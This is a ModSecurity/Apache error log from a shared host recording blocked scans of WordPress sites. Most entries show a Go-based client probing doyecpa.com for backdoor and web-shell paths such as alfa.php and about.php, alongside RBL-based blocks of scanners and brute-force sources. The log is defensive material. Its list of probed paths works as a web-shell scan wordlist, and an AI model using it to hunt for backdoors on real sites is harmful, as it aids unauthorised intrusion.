[Tue May 26 13:49:22.224115 2026] [security2:error] [pid 555743:tid 555945] [client 15.235.169.50:65533] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/pomo/wp-login.php"] [unique_id "ahVXicjqAquC0YaxQjCwqwAAAVI"]
[Tue May 26 13:49:22.712221 2026] [security2:error] [pid 555743:tid 555989] [client 15.235.169.50:49263] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/languages/wp-login.php"] [unique_id "ahVXisjqAquC0YaxQjCwuwAAAX4"]
[Tue May 26 13:49:22.803257 2026] [security2:error] [pid 555743:tid 555987] [client 20.205.111.246:6287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/wp-signin.php"] [unique_id "ahVXisjqAquC0YaxQjCwvgAAAXw"]
[Tue May 26 13:49:23.201615 2026] [security2:error] [pid 555743:tid 555930] [client 15.235.169.50:49338] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/cjfuns.php"] [unique_id "ahVXi8jqAquC0YaxQjCwyQAAAUM"]
[Tue May 26 13:49:23.227438 2026] [security2:error] [pid 560287:tid 560432] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXipmX5s6sDS3wJVcOJQAAAJM"]
[Tue May 26 13:49:23.512168 2026] [security2:error] [pid 560287:tid 560512] [client 20.205.111.246:1943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/wp-blog-header.php"] [unique_id "ahVXi5mX5s6sDS3wJVcONwAAAN4"]
[Tue May 26 13:49:23.703199 2026] [security2:error] [pid 560287:tid 560542] [client 15.235.169.50:49428] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/db-update.php"] [unique_id "ahVXi5mX5s6sDS3wJVcOQQAAAPo"]
[Tue May 26 13:49:24.181326 2026] [security2:error] [pid 555743:tid 555985] [client 15.235.169.50:49491] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/acme-challenge/iR7SzrsOUEP.php"] [unique_id "ahVXjMjqAquC0YaxQjCw2AAAAXo"]
[Tue May 26 13:49:24.647134 2026] [security2:error] [pid 555743:tid 555912] [client 15.235.169.50:49565] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/xl2023.php"] [unique_id "ahVXjMjqAquC0YaxQjCw4QAAATE"]
[Tue May 26 13:49:24.764937 2026] [security2:error] [pid 560287:tid 560496] [client 173.239.240.40:51865] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 40.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahVXjJmX5s6sDS3wJVcOWgAAAM8"]
[Tue May 26 13:49:24.968581 2026] [security2:error] [pid 560287:tid 560489] [client 20.205.111.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.taotechservices.com"] [uri "/index.php"] [unique_id "ahVXjJmX5s6sDS3wJVcOTgAAAMg"]
[Tue May 26 13:49:25.117694 2026] [security2:error] [pid 555743:tid 555945] [client 15.235.169.50:49656] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/images/admin.php"] [unique_id "ahVXjcjqAquC0YaxQjCw7gAAAVI"]
[Tue May 26 13:49:25.414400 2026] [security2:error] [pid 560287:tid 560543] [client 20.205.111.246:1560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/ws.php"] [unique_id "ahVXjZmX5s6sDS3wJVcOawAAAPs"]
[Tue May 26 13:49:25.572228 2026] [security2:error] [pid 555743:tid 555935] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXjcjqAquC0YaxQjCw8QAAAUg"]
[Tue May 26 13:49:25.579442 2026] [security2:error] [pid 555743:tid 555944] [client 15.235.169.50:49731] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/css/about.php"] [unique_id "ahVXjcjqAquC0YaxQjCw_gAAAVE"]
[Tue May 26 13:49:26.063304 2026] [security2:error] [pid 560287:tid 560455] [client 15.235.169.50:49831] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/class-wp-session-json.php"] [unique_id "ahVXjpmX5s6sDS3wJVcOdAAAAKg"]
[Tue May 26 13:49:26.125145 2026] [security2:error] [pid 560287:tid 560486] [client 20.205.111.246:6525] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/wsa.php"] [unique_id "ahVXjpmX5s6sDS3wJVcOdQAAAMU"]
[Tue May 26 13:49:26.529977 2026] [security2:error] [pid 555743:tid 555986] [client 15.235.169.50:49898] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.tmb/cloud.php"] [unique_id "ahVXjsjqAquC0YaxQjCxEQAAAXs"]
[Tue May 26 13:49:26.748765 2026] [security2:error] [pid 555743:tid 555901] [client 106.192.248.115:63461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXjsjqAquC0YaxQjCxFAAAASY"]
[Tue May 26 13:49:26.753237 2026] [security2:error] [pid 555743:tid 555901] [client 106.192.248.115:63461] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXjsjqAquC0YaxQjCxFAAAASY"]
[Tue May 26 13:49:26.870911 2026] [security2:error] [pid 555743:tid 555877] [client 20.205.111.246:1570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/w.php"] [unique_id "ahVXjsjqAquC0YaxQjCxGgAAAQ4"]
[Tue May 26 13:49:27.004142 2026] [security2:error] [pid 555743:tid 555972] [client 15.235.169.50:49974] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/up.php"] [unique_id "ahVXj8jqAquC0YaxQjCxHgAAAW0"]
[Tue May 26 13:49:27.345584 2026] [security2:error] [pid 560287:tid 560471] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXjpmX5s6sDS3wJVcOgAAAALc"]
[Tue May 26 13:49:27.482482 2026] [security2:error] [pid 560287:tid 560503] [client 15.235.169.50:50030] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/xx.php"] [unique_id "ahVXj5mX5s6sDS3wJVcOhgAAANU"]
[Tue May 26 13:49:27.601351 2026] [security2:error] [pid 560287:tid 560539] [client 20.205.111.246:6286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/x.php"] [unique_id "ahVXj5mX5s6sDS3wJVcOiAAAAPc"]
[Tue May 26 13:49:27.959805 2026] [security2:error] [pid 560287:tid 560481] [client 15.235.169.50:50108] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/random_compat/about.php"] [unique_id "ahVXj5mX5s6sDS3wJVcOjQAAAMA"]
[Tue May 26 13:49:28.284653 2026] [security2:error] [pid 555743:tid 555886] [client 129.222.147.134:50592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXkMjqAquC0YaxQjCxMgAAARc"]
[Tue May 26 13:49:28.284836 2026] [security2:error] [pid 555743:tid 555886] [client 129.222.147.134:50592] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXkMjqAquC0YaxQjCxMgAAARc"]
[Tue May 26 13:49:28.371329 2026] [security2:error] [pid 560287:tid 560491] [client 20.205.111.246:1544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/xx.php"] [unique_id "ahVXkJmX5s6sDS3wJVcOmQAAAMo"]
[Tue May 26 13:49:28.440927 2026] [security2:error] [pid 555743:tid 555938] [client 15.235.169.50:50192] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/radio.php"] [unique_id "ahVXkMjqAquC0YaxQjCxNQAAAUs"]
[Tue May 26 13:49:28.940470 2026] [security2:error] [pid 555743:tid 555909] [client 15.235.169.50:50275] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/ws.php7"] [unique_id "ahVXkMjqAquC0YaxQjCxPgAAAS4"]
[Tue May 26 13:49:29.129271 2026] [security2:error] [pid 560287:tid 560463] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXkJmX5s6sDS3wJVcOoQAAALA"]
[Tue May 26 13:49:29.421300 2026] [security2:error] [pid 560287:tid 560518] [client 15.235.169.50:50377] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes/gaukingo/db.php"] [unique_id "ahVXkZmX5s6sDS3wJVcOrgAAAOQ"]
[Tue May 26 13:49:29.442045 2026] [security2:error] [pid 555743:tid 555884] [client 20.205.111.246:6471] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/xmlrpc.php"] [unique_id "ahVXkcjqAquC0YaxQjCxQwAAARU"]
[Tue May 26 13:49:29.894883 2026] [security2:error] [pid 555743:tid 555967] [client 15.235.169.50:50491] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/Enigma.php"] [unique_id "ahVXkcjqAquC0YaxQjCxTgAAAWg"]
[Tue May 26 13:49:30.364290 2026] [security2:error] [pid 560287:tid 560514] [client 15.235.169.50:50555] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/1975.php"] [unique_id "ahVXkpmX5s6sDS3wJVcOwAAAAOA"]
[Tue May 26 13:49:30.487120 2026] [autoindex:error] [pid 560287:tid 560490] [client 43.156.50.197:47506] AH01276: Cannot serve directory /home1/dprlky8f/dprassurance.lk/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:49:30.855645 2026] [security2:error] [pid 555743:tid 555918] [client 15.235.169.50:50639] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/theme-compat/wp-login.php"] [unique_id "ahVXksjqAquC0YaxQjCxXQAAATc"]
[Tue May 26 13:49:31.116525 2026] [security2:error] [pid 560287:tid 560515] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXkpmX5s6sDS3wJVcOwwAAAOE"]
[Tue May 26 13:49:31.152793 2026] [security2:error] [pid 560287:tid 560426] [client 20.205.111.246:1082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/y.php"] [unique_id "ahVXk5mX5s6sDS3wJVcOzQAAAI0"]
[Tue May 26 13:49:31.331565 2026] [security2:error] [pid 560287:tid 560445] [client 15.235.169.50:50713] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/customize/about.php"] [unique_id "ahVXk5mX5s6sDS3wJVcOzgAAAJ8"]
[Tue May 26 13:49:31.809907 2026] [security2:error] [pid 560287:tid 560502] [client 15.235.169.50:50784] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-head.php"] [unique_id "ahVXk5mX5s6sDS3wJVcO2gAAANQ"]
[Tue May 26 13:49:32.281691 2026] [security2:error] [pid 560287:tid 560546] [client 15.235.169.50:50845] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/about.php"] [unique_id "ahVXlJmX5s6sDS3wJVcO4gAAAP4"]
[Tue May 26 13:49:32.603401 2026] [security2:error] [pid 555743:tid 555955] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXlMjqAquC0YaxQjCxdQAAAVw"]
[Tue May 26 13:49:32.763634 2026] [security2:error] [pid 560287:tid 560516] [client 15.235.169.50:50931] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/mini.php"] [unique_id "ahVXlJmX5s6sDS3wJVcO6gAAAOI"]
[Tue May 26 13:49:33.232359 2026] [security2:error] [pid 560287:tid 560462] [client 15.235.169.50:51000] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/css.php"] [unique_id "ahVXlZmX5s6sDS3wJVcO8gAAAK8"]
[Tue May 26 13:49:33.730174 2026] [security2:error] [pid 560287:tid 560510] [client 15.235.169.50:51085] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/TOPXOH/wDR.php"] [unique_id "ahVXlZmX5s6sDS3wJVcPAQAAANw"]
[Tue May 26 13:49:34.115297 2026] [security2:error] [pid 560287:tid 560542] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXlZmX5s6sDS3wJVcPAAAAAPo"]
[Tue May 26 13:49:34.211606 2026] [security2:error] [pid 560287:tid 560550] [client 15.235.169.50:51178] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes/twenty/twenty.php"] [unique_id "ahVXlpmX5s6sDS3wJVcPBwAAAQI"]
[Tue May 26 13:49:34.691989 2026] [security2:error] [pid 560287:tid 560433] [client 15.235.169.50:51244] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/Text/Diff/Renderer/content.php"] [unique_id "ahVXlpmX5s6sDS3wJVcPDgAAAJQ"]
[Tue May 26 13:49:34.991611 2026] [security2:error] [pid 555743:tid 555807] [remote 103.230.156.120:35278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVXlsjqAquC0YaxQjCxngABTT8"]
[Tue May 26 13:49:35.161492 2026] [security2:error] [pid 555743:tid 555976] [client 15.235.169.50:51307] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/images/Mhbgf.php"] [unique_id "ahVXl8jqAquC0YaxQjCxowAAAXE"]
[Tue May 26 13:49:35.646832 2026] [security2:error] [pid 555743:tid 555889] [client 15.235.169.50:51373] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-config-sample.php"] [unique_id "ahVXl8jqAquC0YaxQjCxqgAAARo"]
[Tue May 26 13:49:36.114282 2026] [security2:error] [pid 560287:tid 560460] [client 15.235.169.50:51453] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/Cache/Cache.php"] [unique_id "ahVXmJmX5s6sDS3wJVcPLQAAAK0"]
[Tue May 26 13:49:36.380603 2026] [security2:error] [pid 555743:tid 555933] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXl8jqAquC0YaxQjCxsQAAAUY"]
[Tue May 26 13:49:36.606133 2026] [security2:error] [pid 560287:tid 560507] [client 15.235.169.50:51511] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/about.php"] [unique_id "ahVXmJmX5s6sDS3wJVcPOQAAANk"]
[Tue May 26 13:49:37.108673 2026] [security2:error] [pid 555743:tid 555956] [client 15.235.169.50:51582] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/dropdown.php"] [unique_id "ahVXmcjqAquC0YaxQjCxvAAAAV0"]
[Tue May 26 13:49:37.611849 2026] [security2:error] [pid 555743:tid 555948] [client 15.235.169.50:51676] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/alfa.php"] [unique_id "ahVXmcjqAquC0YaxQjCxwgAAAVU"]
[Tue May 26 13:49:38.057721 2026] [security2:error] [pid 560287:tid 560433] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXmZmX5s6sDS3wJVcPUwAAAJQ"]
[Tue May 26 13:49:38.096993 2026] [security2:error] [pid 555743:tid 555927] [client 15.235.169.50:51759] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/cong.php"] [unique_id "ahVXmsjqAquC0YaxQjCxxwAAAUA"]
[Tue May 26 13:49:38.505677 2026] [security2:error] [pid 560287:tid 560551] [client 129.222.147.134:21562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXmpmX5s6sDS3wJVcPYAAAAQM"]
[Tue May 26 13:49:38.505811 2026] [security2:error] [pid 560287:tid 560551] [client 129.222.147.134:21562] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXmpmX5s6sDS3wJVcPYAAAAQM"]
[Tue May 26 13:49:38.571974 2026] [security2:error] [pid 555743:tid 555907] [client 15.235.169.50:51821] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/radio.php"] [unique_id "ahVXmsjqAquC0YaxQjCx2AAAASw"]
[Tue May 26 13:49:38.848302 2026] [security2:error] [pid 555743:tid 555964] [client 14.244.38.105:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXmsjqAquC0YaxQjCxzwAAAWU"]
[Tue May 26 13:49:39.051744 2026] [security2:error] [pid 560287:tid 560424] [client 15.235.169.50:51890] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/css/colors/blue/1.php"] [unique_id "ahVXm5mX5s6sDS3wJVcPaQAAAIs"]
